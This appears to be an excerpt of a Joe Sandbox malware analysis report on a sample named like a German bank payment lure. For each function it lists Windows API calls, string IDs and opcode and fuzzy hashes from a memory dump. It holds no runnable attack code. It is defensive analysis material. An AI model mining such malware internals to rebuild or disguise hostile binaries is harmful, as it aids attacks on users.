                                                                                                                                                                                                                                          • Source File: 00000002.00000002.3013608350.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.3013608350.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.3013608350.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_400000_Payment_Volksbank_EUR36550-Bestellung -4500673541.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: Time$System$File$LocalSpecific
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID: 979780441-0
                                                                                                                                                                                                                                          • Opcode ID: e6f681992166f7eacb6a90eac37249c69a118d36aeffaac3dc06015c0a75a69a
                                                                                                                                                                                                                                          • Instruction ID: f583aad53f3de4022dcae7e9f33737e8013f67213d7447df07319dea818b2b95
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: e6f681992166f7eacb6a90eac37249c69a118d36aeffaac3dc06015c0a75a69a
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 48F08272900219AFEB019BB1DC49FBBB3FCBB0570AF04443AE112E1090D774D0058B65
                                                                                                                                                                                                                                          Function 004134C6 Relevance: 6.0, APIs: 4, Instructions: 33COMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          • memcpy.MSVCRT(0045A808,?,00000050,?,0040155D,?), ref: 004134E0
                                                                                                                                                                                                                                          • memcpy.MSVCRT(0045A538,?,000002CC,0045A808,?,00000050,?,0040155D,?), ref: 004134F2
                                                                                                                                                                                                                                          • GetModuleHandleW.KERNEL32(00000000), ref: 00413505
                                                                                                                                                                                                                                          • DialogBoxParamW.USER32(00000000,0000006B,?,Function_000131DC,00000000), ref: 00413519
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000002.00000002.3013608350.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.3013608350.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.3013608350.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_400000_Payment_Volksbank_EUR36550-Bestellung -4500673541.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: memcpy$DialogHandleModuleParam
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID: 1386444988-0
                                                                                                                                                                                                                                          • Opcode ID: d55c8f406ca3c44be23ebae39d0952233c85391216aaf70b52daa0aa76105663
                                                                                                                                                                                                                                          • Instruction ID: 364e94b7bdcda47f4d7f1f8d7aeee0d56301a77e6e21c3ce81869cca2c347424
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: d55c8f406ca3c44be23ebae39d0952233c85391216aaf70b52daa0aa76105663
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 80F0E272A843207BF7207FA5AC0AB477E94FB05B03F114826F600E50D2C2B988518F8D
                                                                                                                                                                                                                                          Function 00411D08 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 187windowCOMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          • SendMessageW.USER32(?,00000010,00000000,00000000), ref: 00411D71
                                                                                                                                                                                                                                          • InvalidateRect.USER32(?,00000000,00000000), ref: 00411DC1
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000002.00000002.3013608350.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.3013608350.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.3013608350.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_400000_Payment_Volksbank_EUR36550-Bestellung -4500673541.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: InvalidateMessageRectSend
                                                                                                                                                                                                                                          • String ID: d=E
                                                                                                                                                                                                                                          • API String ID: 909852535-3703654223
                                                                                                                                                                                                                                          • Opcode ID: 4f85adb7d2e1d59cf2ea2def55f14199f34628ec472c317f77867e4e632b01ed
                                                                                                                                                                                                                                          • Instruction ID: 9534a32422cce1c6391a187da628b0196a645ea69cbd0f5c6bc65931d7846800
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 4f85adb7d2e1d59cf2ea2def55f14199f34628ec472c317f77867e4e632b01ed
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 7E61E9307006044BDB20EB658885FEE73E6AF44728F42456BF2195B2B2CB79ADC6C74D
                                                                                                                                                                                                                                          Function 0040F75C Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 111COMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          • wcschr.MSVCRT ref: 0040F79E
                                                                                                                                                                                                                                          • wcschr.MSVCRT ref: 0040F7AC
                                                                                                                                                                                                                                            • Part of subcall function 0040AA8C: wcslen.MSVCRT ref: 0040AAA8
                                                                                                                                                                                                                                            • Part of subcall function 0040AA8C: memcpy.MSVCRT(00000000,?,00000000,00000000,?,0000002C,?,0040F7F4), ref: 0040AACB
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000002.00000002.3013608350.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.3013608350.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.3013608350.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_400000_Payment_Volksbank_EUR36550-Bestellung -4500673541.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: wcschr$memcpywcslen
                                                                                                                                                                                                                                          • String ID: "
                                                                                                                                                                                                                                          • API String ID: 1983396471-123907689
                                                                                                                                                                                                                                          • Opcode ID: 37fc4c0e45f0a8a54b588a11981c40142be0fe56f3c50330bf3b06fef0d62b23
                                                                                                                                                                                                                                          • Instruction ID: b5ec2b97dc3a1d34b4ae52474db4a85f3d32b900c8044ec90cdce640e07fed14
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 37fc4c0e45f0a8a54b588a11981c40142be0fe56f3c50330bf3b06fef0d62b23
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 7C315532904204ABDF24EFA6C8419EEB7B4EF44324F20457BEC10B75D1DB789A46CE99
                                                                                                                                                                                                                                          Function 0040BFF3 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 59COMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                            • Part of subcall function 0040A32D: SetFilePointer.KERNEL32(0040C2BF,?,00000000,00000000,?,0040C0C5,00000000,00000000,?,00000020,?,0040C255,?,?,*.*,0040C2BF), ref: 0040A33A
                                                                                                                                                                                                                                          • _memicmp.MSVCRT ref: 0040C00D
                                                                                                                                                                                                                                          • memcpy.MSVCRT(?,?,00000004,00000000,?,?,?,?,?,?,?,?,*.*,0040C2BF,00000000), ref: 0040C024
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000002.00000002.3013608350.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.3013608350.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.3013608350.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_400000_Payment_Volksbank_EUR36550-Bestellung -4500673541.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: FilePointer_memicmpmemcpy
                                                                                                                                                                                                                                          • String ID: URL
                                                                                                                                                                                                                                          • API String ID: 2108176848-3574463123
                                                                                                                                                                                                                                          • Opcode ID: 0ffae9aaa7e8776105f4b8355cfdff3a17deb021c318058ed5e09a60dc4caa80
                                                                                                                                                                                                                                          • Instruction ID: e2f67ed442a0be3002cd5c838a3b557e7d557c6bd05ddcbc6cfa09d4dad31ce1
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 0ffae9aaa7e8776105f4b8355cfdff3a17deb021c318058ed5e09a60dc4caa80
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 03110271600204FBEB11DFA9CC45F5B7BA9EF41388F004166F904AB291EB79DE10C7A9
                                                                                                                                                                                                                                          Function 0040A353 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 58COMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          • _snwprintf.MSVCRT ref: 0040A398
                                                                                                                                                                                                                                          • memcpy.MSVCRT(?,00000000,00000006,00000000,0000000A,%2.2X ,?), ref: 0040A3A8
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000002.00000002.3013608350.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.3013608350.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.3013608350.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_400000_Payment_Volksbank_EUR36550-Bestellung -4500673541.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: _snwprintfmemcpy
                                                                                                                                                                                                                                          • String ID: %2.2X
                                                                                                                                                                                                                                          • API String ID: 2789212964-323797159
                                                                                                                                                                                                                                          • Opcode ID: ad0fc0dc4c4054376e52d8ba7d115ce3a6dbc9d30928944a1ebc7f5d9ce1ea74
                                                                                                                                                                                                                                          • Instruction ID: 802357eb4f50a043e47c8b78e7782d62930b20b04af67ea92e1f933aeb07fc5a
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: ad0fc0dc4c4054376e52d8ba7d115ce3a6dbc9d30928944a1ebc7f5d9ce1ea74
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 71118E32900309BFEB10DFE8D8829AFB3B9FB05314F108476ED11E7141D6789A258B96
                                                                                                                                                                                                                                          Function 0040F9B5 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 49COMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000002.00000002.3013608350.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.3013608350.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.3013608350.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_400000_Payment_Volksbank_EUR36550-Bestellung -4500673541.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: _snwprintf
                                                                                                                                                                                                                                          • String ID: %%-%d.%ds
                                                                                                                                                                                                                                          • API String ID: 3988819677-2008345750
                                                                                                                                                                                                                                          • Opcode ID: 8c42abe836b5748aab53ff08ce10aa76654ad8be3bc89765447896375e8e9e9f
                                                                                                                                                                                                                                          • Instruction ID: 7541af853baca77dfc804340e5f0ab0fe899c5989b891af63cf45e557cb41de3
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 8c42abe836b5748aab53ff08ce10aa76654ad8be3bc89765447896375e8e9e9f
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: B801DE71200204BFD720EE59CC82D5AB7E8FB48308B00443AF846A7692D636E854CB65
                                                                                                                                                                                                                                          Function 004018DB Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 37COMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          • GetWindowPlacement.USER32(?,?,?,?,?,00411B7F,?,General,?,00000000,00000001), ref: 00401904
                                                                                                                                                                                                                                          • memset.MSVCRT ref: 00401917
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000002.00000002.3013608350.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.3013608350.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.3013608350.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_400000_Payment_Volksbank_EUR36550-Bestellung -4500673541.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: PlacementWindowmemset
                                                                                                                                                                                                                                          • String ID: WinPos
                                                                                                                                                                                                                                          • API String ID: 4036792311-2823255486
                                                                                                                                                                                                                                          • Opcode ID: cc976631f63ab64371ec6397e0998f8e0ccbda94530cdc87a4e9cd2a1bc3c647
                                                                                                                                                                                                                                          • Instruction ID: 942d740d8c3c01bede0812328a3a4706cce13fdf2e849e9dfea5930b7654417c
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: cc976631f63ab64371ec6397e0998f8e0ccbda94530cdc87a4e9cd2a1bc3c647
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: D4F096B0600204EFEB04DF55D899F6A33E8EF04701F1440B9F909DB1D1E7B89A04C729
                                                                                                                                                                                                                                          Function 0040DCE0 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 15COMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                            • Part of subcall function 00409BCA: GetModuleFileNameW.KERNEL32(00000000,00000208,00000104,0040DCE6,00000000,0040DB99,?,00000000,00000208,?), ref: 00409BD5
                                                                                                                                                                                                                                          • wcsrchr.MSVCRT ref: 0040DCE9
                                                                                                                                                                                                                                          • wcscat.MSVCRT ref: 0040DCFF
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000002.00000002.3013608350.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.3013608350.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.3013608350.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_400000_Payment_Volksbank_EUR36550-Bestellung -4500673541.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: FileModuleNamewcscatwcsrchr
                                                                                                                                                                                                                                          • String ID: _lng.ini
                                                                                                                                                                                                                                          • API String ID: 383090722-1948609170
                                                                                                                                                                                                                                          • Opcode ID: 5efb5a13be846493ae7bde14296389ab58a252fc212a622dbc96a3230e290a6c
                                                                                                                                                                                                                                          • Instruction ID: 003e7a9acac466aac22365d7a2b75ab102816a5e64793edac74c8fca87dba5cc
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 5efb5a13be846493ae7bde14296389ab58a252fc212a622dbc96a3230e290a6c
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: CEC0129654561430F51526116C03B4E12585F13316F21006BFD01340C3EFAD5705406F
                                                                                                                                                                                                                                          Function 00414B81 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 13libraryloaderCOMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                            • Part of subcall function 0040A804: memset.MSVCRT ref: 0040A824
                                                                                                                                                                                                                                            • Part of subcall function 0040A804: GetSystemDirectoryW.KERNEL32(C:\Windows\system32,00000104), ref: 0040A841
                                                                                                                                                                                                                                            • Part of subcall function 0040A804: wcscpy.MSVCRT ref: 0040A854
                                                                                                                                                                                                                                            • Part of subcall function 0040A804: wcscat.MSVCRT ref: 0040A86A
                                                                                                                                                                                                                                            • Part of subcall function 0040A804: LoadLibraryW.KERNELBASE(00000000), ref: 0040A87B
                                                                                                                                                                                                                                            • Part of subcall function 0040A804: LoadLibraryW.KERNEL32(?), ref: 0040A884
                                                                                                                                                                                                                                          • GetProcAddress.KERNEL32(00000000,SHGetSpecialFolderPathW), ref: 00414BA4
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000002.00000002.3013608350.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.3013608350.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.3013608350.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_400000_Payment_Volksbank_EUR36550-Bestellung -4500673541.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: LibraryLoad$AddressDirectoryProcSystemmemsetwcscatwcscpy
                                                                                                                                                                                                                                          • String ID: SHGetSpecialFolderPathW$shell32.dll
                                                                                                                                                                                                                                          • API String ID: 2773794195-880857682
                                                                                                                                                                                                                                          • Opcode ID: 92b59310a7696b31d56b4dabc8b2146732067b292673cf67eedff05cdcb4dbe7
                                                                                                                                                                                                                                          • Instruction ID: 520684b8054713cb13715c6c8af1848dbb459e29e8538d47b3508bbaa4bbc045
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 92b59310a7696b31d56b4dabc8b2146732067b292673cf67eedff05cdcb4dbe7
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 23D0C7719483019DD7105F65AC19B8336545B50307F204077AC04E66D7EA7CC4C49E1D
                                                                                                                                                                                                                                          Function 0040A153 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 12COMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          • GetWindowLongW.USER32(?,000000EC), ref: 0040A159
                                                                                                                                                                                                                                          • SetWindowLongW.USER32(000000EC,000000EC,00000000), ref: 0040A16B
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000002.00000002.3013608350.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.3013608350.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.3013608350.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_400000_Payment_Volksbank_EUR36550-Bestellung -4500673541.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: LongWindow
                                                                                                                                                                                                                                          • String ID: MZ@
                                                                                                                                                                                                                                          • API String ID: 1378638983-2978689999
                                                                                                                                                                                                                                          • Opcode ID: 897d752f6043cc922bbe5e3779e5fd859b92255b25006c63bcdd8f44162c87a9
                                                                                                                                                                                                                                          • Instruction ID: 658df1d6f65a5f4ca5cf2dc917bfbc57e2b12ac14a328fb0c2cac09aa770bd9f
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 897d752f6043cc922bbe5e3779e5fd859b92255b25006c63bcdd8f44162c87a9
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 3FC0027415D116AFDF112B35EC0AE2A7EA9BB86362F208BB4B076E01F1CB7184109A09
                                                                                                                                                                                                                                          Function 0042B9BD Relevance: 5.2, APIs: 4, Instructions: 181COMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          • memcpy.MSVCRT(?,?,00000000,?), ref: 0042BA5F
                                                                                                                                                                                                                                          • memcpy.MSVCRT(?,?,?,?), ref: 0042BA98
                                                                                                                                                                                                                                          • memset.MSVCRT ref: 0042BAAE
                                                                                                                                                                                                                                          • memcpy.MSVCRT(?,?,00000000,?,?,?,?,?,?,?), ref: 0042BAE7
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000002.00000002.3013608350.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.3013608350.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.3013608350.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_400000_Payment_Volksbank_EUR36550-Bestellung -4500673541.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: memcpy$memset
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID: 438689982-0
                                                                                                                                                                                                                                          • Opcode ID: 03305e9dc29a3088a8453c5c8815f649f32074ab8e1cbf0618065e1a77e51243
                                                                                                                                                                                                                                          • Instruction ID: 797e1fd24865db6de4a95defd5ca955254a0dec7c2ff798398e4890fb9874305
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 03305e9dc29a3088a8453c5c8815f649f32074ab8e1cbf0618065e1a77e51243
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 1B51A2B5A00219EBDF14DF55D882BAEBBB5FF04340F54806AE904AA245E7389E50DBD8
                                                                                                                                                                                                                                          Function 0040E820 Relevance: 5.1, APIs: 4, Instructions: 70COMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                            • Part of subcall function 0040A13C: memset.MSVCRT ref: 0040A14A
                                                                                                                                                                                                                                          • ??2@YAPAXI@Z.MSVCRT ref: 0040E84D
                                                                                                                                                                                                                                          • ??2@YAPAXI@Z.MSVCRT(00000014), ref: 0040E874
                                                                                                                                                                                                                                          • ??2@YAPAXI@Z.MSVCRT(00000014), ref: 0040E895
                                                                                                                                                                                                                                          • ??2@YAPAXI@Z.MSVCRT(00000014), ref: 0040E8B6
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000002.00000002.3013608350.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.3013608350.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.3013608350.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_400000_Payment_Volksbank_EUR36550-Bestellung -4500673541.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: ??2@$memset
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID: 1860491036-0
                                                                                                                                                                                                                                          • Opcode ID: 96af4030734a5e2f6ef23c2ae6277f6dabdb1784b135b246f31e93988d402875
                                                                                                                                                                                                                                          • Instruction ID: 7dda0de82ffecb18951b1be6aadeef514c87807746e1e94fbb8d74dd8fa57bec
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 96af4030734a5e2f6ef23c2ae6277f6dabdb1784b135b246f31e93988d402875
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 4F21F3B1A003008FDB219F2B9445912FBE8FF90310B2AC8AF9158CB2B2D7B8C454CF15
                                                                                                                                                                                                                                          Function 0040A8D0 Relevance: 5.1, APIs: 4, Instructions: 69COMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          • wcslen.MSVCRT ref: 0040A8E2
                                                                                                                                                                                                                                            • Part of subcall function 004099F4: malloc.MSVCRT ref: 00409A10
                                                                                                                                                                                                                                            • Part of subcall function 004099F4: memcpy.MSVCRT(00000000,00000000,00000000,00000000,?,0040A9F2,00000002,?,00000000,?,0040AD25,00000000,?,00000000), ref: 00409A28
                                                                                                                                                                                                                                            • Part of subcall function 004099F4: free.MSVCRT ref: 00409A31
                                                                                                                                                                                                                                          • free.MSVCRT ref: 0040A908
                                                                                                                                                                                                                                          • free.MSVCRT ref: 0040A92B
                                                                                                                                                                                                                                          • memcpy.MSVCRT(?,?,000000FF,00000001,?,00000000,?,?,0040AD76,?,000000FF), ref: 0040A94F
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000002.00000002.3013608350.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.3013608350.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.3013608350.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_400000_Payment_Volksbank_EUR36550-Bestellung -4500673541.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: free$memcpy$mallocwcslen
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID: 726966127-0
                                                                                                                                                                                                                                          • Opcode ID: 48b5110f71ff603a034409774c278151667955e8266c70f87da55b4d75e749d9
                                                                                                                                                                                                                                          • Instruction ID: f32a9ac0308abec2140ef864181b54c8d04bf3279582b466e144db770ea3622c
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 48b5110f71ff603a034409774c278151667955e8266c70f87da55b4d75e749d9
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 64217CB2200704EFC720DF18D88189AB3F9FF453247118A2EF866AB6A1CB35AD15CB55
                                                                                                                                                                                                                                          Function 0040B1D1 Relevance: 5.1, APIs: 4, Instructions: 67COMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          • wcslen.MSVCRT ref: 0040B1DE
                                                                                                                                                                                                                                          • free.MSVCRT ref: 0040B201
                                                                                                                                                                                                                                            • Part of subcall function 004099F4: malloc.MSVCRT ref: 00409A10
                                                                                                                                                                                                                                            • Part of subcall function 004099F4: memcpy.MSVCRT(00000000,00000000,00000000,00000000,?,0040A9F2,00000002,?,00000000,?,0040AD25,00000000,?,00000000), ref: 00409A28
                                                                                                                                                                                                                                            • Part of subcall function 004099F4: free.MSVCRT ref: 00409A31
                                                                                                                                                                                                                                          • free.MSVCRT ref: 0040B224
                                                                                                                                                                                                                                          • memcpy.MSVCRT(00000000,00000000,-00000002,00000000,00000000,?,?,?,?,0040B319,0040B432,00000000,?,?,0040B432,00000000), ref: 0040B248
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000002.00000002.3013608350.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.3013608350.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.3013608350.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_400000_Payment_Volksbank_EUR36550-Bestellung -4500673541.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: free$memcpy$mallocwcslen
                                                                                                                                                                                                                                          • String ID:
